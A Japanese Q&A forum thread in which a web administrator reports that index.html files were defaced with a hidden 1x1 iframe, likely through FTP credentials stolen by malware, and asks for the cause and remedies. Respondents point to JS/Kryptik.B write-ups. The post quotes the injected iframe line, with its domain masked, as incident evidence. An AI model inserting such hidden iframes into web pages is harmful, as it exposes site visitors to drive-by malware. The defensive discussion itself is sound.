初めて、質問をさせていただきます。
WEB関係の仕事をしていながら大変お恥ずかしいのですが、
アタックにより、管理しているウェブサイトの一部が改ざんされました。
(現象)
具体的には、「index.html」と名づけされたファイルの
ソース最終部分に、以下のコードが追記されていました。
【URLは念のため、書き換えています】
<iframe src="?http://***.net/?click=D1A4LDM"? width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
※他ファイル名は、拡張子が「html」であっても一切被害なし
※私は直接アクセスしていませんが、他担当によると、
本ドメインに接続すると、ブラウザクラッシュしたとの報告がありました。
※click=以降の英数7文字は、乱数により各ページに異なった文字が記載
また、書き換えられたファイルのタイムスタンプを確認し、
該当時間のftpサーバログを調べると、社内IPからの接続形跡があり、
今回、改ざんされていた該当ファイルの書き換え履歴がありました。
現在、全ファイルの該当箇所を削除し、再アップロード。
また、利用していたFTPアカウントを廃止し、新規FTPアカウントを発行しました。
IDCには、サーバがクラックされた可能性がないが調査依頼し、
現在のところ、調査中です。
(ウイルスの疑いと、発見・駆除)
ただ、その時間帯に誰もFTPを行っていなかったため、
ウイルスの可能性が考えられ、対策ソフトでスキャンしたところ、
1台より、W32.Sality.AM というウイルスが検出され、駆除しました。
?http://www.threatexpert.com/report.aspx?md5=2558 …
しかし、ウイルスの性質を見ても、ftpアカウントを盗聴し、
特定サイトに接続し、index.htmlファイルをダウンロード、改ざん、アップロードする・・といった行為を
働くようなことは記載されていませんでした。
(皆様へご相談)
FTPログに社内IPからのFTP接続履歴があったため、我々のセキュリティに問題があったことを
推測しているのですが、ウイルスレポートからも、発見されたウイルスが、現象を引き起こしたとは
特定しにくいと感じております。
そのため、ウイルス対策ソフトでは特定できない別のウイルスに感染している可能性を考えております。
国内のQ&Aサイトでは、同様の現象を発見できなかったため、
海外の掲示板を見たところ、同様の現象を発見したのですが、
原因までは特定されていませんでした。
そこで、ご存知の方がいらっしゃいましたらお知恵を拝借させていただきたいのですが、
本件の原因は何によるものでしょうか?
また、書き換えられた箇所削除・FTPアカウント変更の他にすべき対策や、
今後のための予防措置などあれば、アドバイスいただけますと有難く存じます。
何卒、宜しくお願いいたします。
No.1ベストアンサー
- 回答日時:
「index.html visibility hidden position absolute iframe」のキーワードでぐぐってみました。
以下のURL(英語)に答えがあるように思えますが、いかがでしょうか。一番詳しいのはここ↓
http://www.diovo.com/2009/03/hidden-iframe-injec …
この中で「AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.」と述べていることに注目。
ここ↓でも同様の書き込みが見つかる。
http://forums.digitalpoint.com/showthread.php?t= …
ここ↓では、攻撃者にページがハックされてコードが埋め込まれたのではないかと述べられ、ESETがJS/Kryptik.B trojanを削除したと書いてある。(同様の書き込みが複数見つかる。)
http://answers.yahoo.com/question/index?qid=2008 …
アドバイスを頂き、ありがとうございます。
ご紹介いただいたサイトは、まさに探していた情報が記載されていました。
これまでに確認できた事実が、上記ウイルスのみであったことと、
他の情報サイトを確認しても侵入経路が不明というケースが多かったため、
大変参考になりました。
有難うございました!
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- ドメイン・サーバー・クラウドサービス FileZillaを使用してwpXサーバーに接続できない 2 2022/03/29 21:02
- サーバー FTPサーバについて詳しい方(アクセス権のないディレクトリを非表示にする方法) 4 2022/08/22 22:33
- サーバー Googleドライブなどを使わずにテザリングAndroidでWindowsとファイル共有 1 2023/02/19 13:14
- Excel(エクセル) マクロの付いたExcelが開けません 3 2023/02/01 10:54
- PHP htmlspecialcharsが機能していないです。 バグですか? 1 2022/04/05 01:22
- YouTube SMS認証が出来なくて乗っ取られたアカウントを取り戻せません。 2 2023/04/02 15:29
- Visual Basic(VBA) 特定の文字を簡単な操作で半角スペースに変換するか削除したい 2 2022/11/01 10:35
- SEO googleサーチコンソールで、重複URLが多数発生、その修正方法について 2 2023/06/23 16:15
- サーバー FFFTPで特定サイトだけUploadできない 4 2022/08/27 14:53
- 医療・安全 アメリカで日本からの旅行者が監視追跡対象になったばかりのBA.2.86に感染していたとのこと 現在E 3 2023/08/23 15:27
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
マカフィーで必要なファイルが...
-
ウイルスの「検疫」について教...
-
Laroux の駆除方法を教...
-
ファイアウォール。 ウインドウ...
-
スタンドアローンパソコンのウ...
-
backdoorと言うウイルスについて
-
CRCK_NERO.Cというスパイウェア...
-
ネットに接続できないパソコン...
-
ノートンで「修復できませんで...
-
Norton AntiVirusが電子メール...
-
ネットワークウィルスパターン...
-
マクロの付いたExcelが開けません
-
パソコンのデスクトップ画面に...
-
pcについての質問です。wavessy...
-
ファイルの移動、削除、計算中...
-
コマンドプロンプトでのBATファ...
-
中断したダウンロード(拡張子...
-
Everything というフリーソフト...
-
McAfee マカフィー ウィルスス...
-
トロイの木馬に感染しました!
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
マカフィーで必要なファイルが...
-
マクロの付いたExcelが開けません
-
トロイの木馬が検出されました。
-
ウイルスの「検疫」について教...
-
USBがウイルスに感染?
-
windows10 ウイルスバスターで...
-
windowsエクスプローラーからの...
-
Laroux の駆除方法を教...
-
タスクマネージャのプロセスに...
-
ノートンとsoftonicについて
-
ファイルをダウンロードしただ...
-
ノートンで「修復できませんで...
-
ウイルスですか??画面が真っ...
-
デスクトップのアイコンが変に...
-
拡張子が「.JPG」の添付ファイ...
-
ファイアウォール。 ウインドウ...
-
スタンドアローンパソコンのウ...
-
エラーLU1847
-
ファイルの更新日時が異常 など
-
危険な拡張子のファイルは?
おすすめ情報